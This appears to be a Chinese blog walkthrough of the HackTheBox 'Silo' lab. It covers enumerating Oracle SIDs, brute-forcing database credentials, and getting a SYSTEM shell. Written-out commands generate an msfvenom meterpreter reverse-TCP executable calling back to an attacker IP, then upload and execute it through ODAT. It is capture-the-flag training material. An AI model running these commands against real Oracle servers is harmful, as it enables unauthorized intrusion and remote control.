Skip to content

Latest commit

 

History

History
177 lines (90 loc) · 8.07 KB

HackTheBox-windows-Silo.md

File metadata and controls

177 lines (90 loc) · 8.07 KB

本文由 简悦 SimpRead 转码, 原文地址 mp.weixin.qq.com

大余安全  

一个每日分享渗透小技巧的公众号

大家好,这里是 大余安全 的第 61 篇文章,本公众号会每日分享攻防渗透技术给大家。

靶机地址:https://www.hackthebox.eu/home/machines/profile/131

靶机难度:中级(5.0/10)

靶机发布日期:2018 年 8 月 18 日

靶机描述:

Silo focuses mainly on leveraging Oracle to obtain a shell and escalate privileges. It was intended to be completed manually using various tools, however Oracle Database Attack Tool greatly simplifies the process, reducing the difficulty of the machine substantially.

请注意:对于所有这些计算机,我是通过平台授权允许情况进行渗透的。我将使用 Kali Linux 作为解决该 HTB 的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。

一、信息收集

可以看到靶机的 IP 是 10.10.10.82,windows 系统的靶机.... 可以在图中看到 real-life 值很高,偏向于现实环境... 嘿嘿,一台真实的靶机?

官方给的思路:Silo 主要利用 Oracle 获得外壳并提升特权...

今天要对 Oracle 数据库服务器进行渗透了...

nmap 扫描可以看出,开放了很多端口...80:Microsoft IIS httpd 8.5

以及 1521oracle 的端口开放了 oracle-tns 服务... 直接对这两个渗透...

ODAT:https://github.com/quentinhardy/odat  --- 官方给了 ODAT 脚本的链接...ODAT 是一个开源的代码渗透测试工具,主要用于攻击测试和审计 Oracle 数据库服务器的安全性...

下载好 ODAT 后... 开始利用 odat.py 对 oracle 渗透....(这是个非常好的脚本... 对开发和数据库运维人员有很大的帮助检查问题)

需要下载安装 ODAT 版本才可以运行脚本...

这里安装可以参考 https://github.com/quentinhardy/odat 下面的内容....

我就不介绍安装步骤了,我这里安装了 4 次... 也算是熟悉了...

经过利用 oday 扫描发现两个 SID:

XE、XEXDB

auxiliary/scanner/oracle/sid_brute

另外一种方法是利用 MSF 内核,发现这个更快就能发现....

现在知道了存在 SID,还需要知道凭证才可以登陆... 目的是登陆数据库...

这里需要暴力破解....

也可以利用 MSF... 去爆破...

二、提权

方法 1:

方法 1 我使用了最暴力的方法提权... 利用 odat.py....

ython3 odat.py passwordguesser -s 10.10.10.82 -p 1521 -d XE --accounts-file accounts/dayupasswd.txt

爆破发现用户名密码:

scott/tiger

 (这里我使用自己的密码本是我做过几次了.. 使用 accounts 自带的密码本是可以爆破的,就是花了几个小时... 所以我就演示方法)

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.14.16 lport=6666 -f exe > dayu.exe

生成 EXE 反向 shell 文件...

python3 odat.py utlfile -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --sysdba --putFile c:/ dayu.exe dayu.exe

使用 odat.py 上传成功反向 shell 脚本...

python3 odat.py externaltable -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --sysdba --exec c:/ dayu.exe

可以看到通过 odat 脚本上传了反向 shell 后,在通过 odat 执行了 shell,获得反向外壳,成功提权获得 root.txt....

方法 2:

可以看到此用户允许修改用户密码、创建表格、CVE-2018-3004 创建文件、CVE-2012-3137 允许使用密匙等等.....

可以通过上传文件... 或者写 shell.... 或者使用密匙登录获得低权 shell...

可以通过 smbserver.py 创建共享,文件上传... 然后数据库里头存在 administrator 的密码... 我就不写出来了,最近有挺多事的...

这里想怎么玩怎么玩,非常非常好的一台数据库靶机... 可以学到很多东西....

由于我们已经成功得到 root 权限查看 user.txt 和 root.txt,因此完成了简单靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。

如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。

如果觉得这篇文章对你有帮助,可以转发到朋友圈,谢谢小伙伴~

2021.6.9~2021.6.16 号开启收徒模式,实战教学,有想法的私聊!

欢迎加入渗透学习交流群,想入群的小伙伴们加我微信,共同进步共同成长!

大余安全

一个全栈渗透小技巧的公众号